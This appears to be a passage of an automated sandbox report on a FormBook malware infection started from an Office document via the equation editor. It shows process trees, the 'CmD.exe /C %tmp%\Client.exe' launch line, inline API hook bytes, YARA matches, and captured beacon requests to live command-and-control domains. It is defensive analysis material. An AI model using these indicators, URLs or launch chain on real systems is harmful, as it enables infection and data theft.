                                                Aug 8, 2022 18:39:45.738852978 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:45.756073952 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209754944 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209817886 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209853888 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209891081 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.209923983 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.210068941 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:46.210129976 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:46.210244894 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:39:46.227530956 CEST804917166.235.200.170192.168.2.22
                                                Aug 8, 2022 18:39:46.227902889 CEST4917180192.168.2.2266.235.200.170
                                                Aug 8, 2022 18:40:04.628437996 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:04.814755917 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:04.814852953 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:04.832439899 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:05.021908045 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:05.021940947 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:05.021955013 CEST8049172104.167.67.175192.168.2.22
                                                Aug 8, 2022 18:40:05.022198915 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:05.048086882 CEST4917280192.168.2.22104.167.67.175
                                                Aug 8, 2022 18:40:05.233951092 CEST8049172104.167.67.175192.168.2.22

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 8, 2022 18:39:45.500391006 CEST5586853192.168.2.228.8.8.8
                                                Aug 8, 2022 18:39:45.673486948 CEST53558688.8.8.8192.168.2.22
                                                Aug 8, 2022 18:40:04.426235914 CEST4968853192.168.2.228.8.8.8
                                                Aug 8, 2022 18:40:04.601803064 CEST53496888.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Aug 8, 2022 18:39:45.500391006 CEST192.168.2.228.8.8.80xca6dStandard query (0)www.thegoldencamel.onlineA (IP address)IN (0x0001)
                                                Aug 8, 2022 18:40:04.426235914 CEST192.168.2.228.8.8.80x1666Standard query (0)www.best-boy.netA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Aug 8, 2022 18:39:45.673486948 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.thegoldencamel.onlinethegoldencamel.onlineCNAME (Canonical name)IN (0x0001)
                                                Aug 8, 2022 18:39:45.673486948 CEST8.8.8.8192.168.2.220xca6dNo error (0)thegoldencamel.online66.235.200.170A (IP address)IN (0x0001)
                                                Aug 8, 2022 18:40:04.601803064 CEST8.8.8.8192.168.2.220x1666No error (0)www.best-boy.net104.167.67.175A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • www.thegoldencamel.online
                                                • www.best-boy.net

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.224917166.235.200.17080C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 18:39:45.738852978 CEST0OUTGET /nb30/?4hntpZ=HrFg7Zw77Q4AgN6xWDdwD99B0qzSSsTIjhXIVaLmDYdCsLEuJk5C8qRmA5PaAiVsBqYing==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.thegoldencamel.online
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 18:39:46.209754944 CEST2INHTTP/1.1 404 Not Found
                                                Date: Mon, 08 Aug 2022 16:39:46 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                Link: <https://www.thegoldencamel.online/wp-json/>; rel="https://api.w.org/"
                                                Vary: Accept-Encoding
                                                X-Endurance-Cache-Level: 2
                                                X-nginx-cache: WordPress
                                                CF-Cache-Status: MISS
                                                Server: cloudflare
                                                CF-RAY: 7379b09ee927997b-FRA
                                                Data Raw: 31 36 61 33 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 54 68 65 20 47 6f 6c 64 65 6e 20 43 61 6d 65 6c 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 67 6f 6c 64 65 6e 63 61 6d 65 6c 2e 6f 6e 6c 69 6e 65 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67
                                                Data Ascii: 16a3<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - The Golden Camel</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - The Golden Camel" /><meta property="og:site_name" content="The Golden Camel" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.thegoldencamel.online/#organization","name":"The Golden Camel","url":"https://www.thegoldencamel.online/","sameAs":[],"log


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.2249172104.167.67.17580C:\Windows\explorer.exe
                                                TimestampkBytes transferredDirectionData
                                                Aug 8, 2022 18:40:04.832439899 CEST8OUTGET /nb30/?4hntpZ=WWLsvV61WazOGjhWPmK2zCox7nD1HU3ZrNfLe9lvYYokad8918qHb5Jmu9JsRIh/3onKEQ==&PPa=ApcXW2 HTTP/1.1
                                                Host: www.best-boy.net
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Aug 8, 2022 18:40:05.021908045 CEST9INHTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Mon, 08 Aug 2022 16:40:01 GMT
                                                Content-Type: text/html
                                                Content-Length: 2158
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b3 b2 ba fe bd d8 c9 ce b9 a4 b3 cc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 32 31 39 34 33 3b 26 23 32 37 37 30 30 3b 26 23 32 31 31 36 30 3b 26 23 32 34 35 37 37 3b 26 23 32 32 32 37 30 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35 3b 2c 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 2c 26 23 33 30 30 30 37 3b 26 23 32 32 38 39 39 3b 26 23 32 31 38 36 36 3b 26 23 32 38 36 30 38 3b 26 23 32 38 38 37 32 3b 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 32 31 39 34 33 3b 26 23 32 37 37 30 30 3b 26 23 32 31 31 36 30 3b 26 23 32 34 35 37 37 3b 26 23 32 32 32 37 30 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 34 39 3b 26 23 35 36 3b 26 23 33 31 31 30 35 3b 26 23 32 36 30 38 30 3b 26 23 33 36 39 37 34 3b 26 23 32 35 33 37 37 3b 26 23 32 31 38 36 36 3b 26 23 32 31 38 36 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 33 32 37 36 39 3b 26 23 32 33 33 37 36 3b 26 23 32 31 33 32 30 3b 26 23 32 32 38 31 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 35 36 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 38 31 3b 26 23 32 31 33 34 35
                                                Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>,&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;</title><meta name="keywords" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345;,&#22269;&#20135;&#31934;&#21697;&#26080;&#30721;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;&#20037;,&#30007;&#22899;&#21866;&#28608;&#28872;&#39640;&#28526;&#21943;&#27700;&#21160;&#24577;&#22270;" /><meta name="description" content=",&#49;&#56;&#31105;&#26080;&#36974;&#25377;&#21866;&#21866;&#26080;&#30721;&#32593;&#31449;,&#32769;&#23376;&#21320;&#22812;&#31934;&#21697;&#56;&#56;&#56;&#26080;&#30721;&#19981;&#21345


                                                Code Manipulations

                                                User Modules

                                                Hook Summary

                                                Function NameHook TypeActive in Processes
                                                PeekMessageAINLINEexplorer.exe
                                                PeekMessageWINLINEexplorer.exe
                                                GetMessageWINLINEexplorer.exe
                                                GetMessageAINLINEexplorer.exe

                                                Processes

                                                Process: explorer.exe, Module: USER32.dll
                                                Function NameHook TypeNew Data
                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6
                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                                GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE6
                                                GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE6

                                                Statistics

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:18:38:13
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                Imagebase:0x13f020000
                                                File size:1423704 bytes
                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:2
                                                Start time:18:38:16
                                                Start date:08/08/2022
                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                Imagebase:0x400000
                                                File size:543304 bytes
                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:3
                                                Start time:18:38:17
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:CmD.exe /C %tmp%\Client.exe A C
                                                Imagebase:0x4a120000
                                                File size:302592 bytes
                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Target ID:6
                                                Start time:18:38:18
                                                Start date:08/08/2022
                                                Path:C:\Users\user\AppData\Local\Temp\Client.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Local\Temp\Client.exe A C
                                                Imagebase:0xa20000
                                                File size:954368 bytes
                                                MD5 hash:B4F00BB75BFD5C4E2C9D0CD6070E8E54
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 24%, ReversingLabs
                                                Reputation:low

                                                General

                                                Target ID:9
                                                Start time:18:38:34
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\notepad.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
                                                Imagebase:0x660000
                                                File size:179712 bytes
                                                MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                General

                                                Target ID:10
                                                Start time:18:38:41
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0xff040000
                                                File size:3229696 bytes
                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:11
                                                Start time:18:39:20
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\ipconfig.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                Imagebase:0x370000
                                                File size:27136 bytes
                                                MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
